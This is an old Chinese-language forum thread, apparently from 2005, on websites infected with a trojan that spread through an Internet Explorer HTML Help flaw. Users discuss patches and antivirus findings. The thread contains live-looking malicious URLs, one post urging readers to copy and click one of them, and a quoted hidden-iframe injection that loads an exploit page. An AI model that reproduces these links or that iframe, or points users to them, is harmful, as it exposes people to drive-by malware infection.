yesonline
2005-02-07, 03:35 AM
真正的位置在這邊....
請自行複製點選連結
"http://4764467445.b108.zgsj.com/count.htm"
贊助商連結
請自行複製點選連結
"http://4764467445.b108.zgsj.com/count.htm"
贊助商連結
贊助商連結 yesonline 2005-02-07, 03:35 AM 真正的位置在這邊.... 請自行複製點選連結 "http://4764467445.b108.zgsj.com/count.htm" 贊助商連結 mus000 2005-02-07, 08:55 AM 用 FireFox 不需要擔心啦。 用戶端的應該是利用這個漏洞的。 http://www.microsoft.com/taiwan/security/bulletin/MS05-001.mspx Microsoft 安全性公告 MS05-001 HTML Help 說明檔的弱點可能會允許程式碼執行 (890175) 記得去修補 IE 漏洞。 另外,好心一點的就寫 email 去告訴它們網站客服人員,或去留言版留個言提醒一下吧。 最近已經碰過不少的 MS IIS + ASP 站台都中毒中木馬到不知不覺了。 PS: 用 FireFox 的,你會在頁面左上角看到一個奇怪的符號跟數字 1 之類的。那個就是隱藏的病毒網頁 count.htm 執行後的結果。用IE的看不到。 enzoferrari23 2005-02-08, 01:13 AM KB890175就算是有安裝了SP2也是要更新喔! :) hsien1128 2005-02-09, 09:42 PM 我也是在tcr這網站中木馬的大家千萬不要去 yuping 2005-02-09, 10:47 PM 今天微軟更新了2月份的patch後不知道這個漏洞解掉沒? zame123 2005-02-10, 01:49 AM 今天微軟更新了2月份的patch後不知道這個漏洞解掉沒? 好像沒有。我是不是中毒了啊。 :|||: http://img213.exs.cx/img213/9092/200502100gq.jpg enzoferrari23 2005-02-11, 07:07 AM F-Secure Corporation 的回答 ================================== Thanks for your report. We have checked the website and found a CHM file that drops a trojan downloader. This trojan downloader hiddenly downloads and run another executable file which is detected as follows: -------------------------------------------------------------- Scanning Report 10 February 2005 15:50:02 - 15:50:09 Target: C:\1 Result: 1 virus found * C:\1\setup.ex Infection: Trojan-PSW.Win32.Lineage.ah Action: Renamed. -------------------------------------------------------------- We will file the abuse report about the download site and add detection for the trojan downloader. Regards, 天氣預報 2005-02-11, 07:19 PM 現在有哪幾家防毒掃得到的呢? darren2000 2005-02-14, 05:57 PM http://www.papago.com.tw/ 這個網站似乎也被植入木馬 進去討論區KAV就跳出了 ----- 原始碼怎麼看不到它插入的CSS? yuping 2005-02-15, 12:02 AM http://www.papago.com.tw/ 這個網站似乎也被植入木馬 進去討論區KAV就跳出了 ----- 原始碼怎麼看不到它插入的CSS? 沒錯!http://www.mactiontech.com/big5/board/board.asp 程式碼<iframe width=0 height=0 src=http://www.szadk.com/new.htm></iframe> kav偵測為 new.htm - infected by Exploit.VBS.Phel.c |
|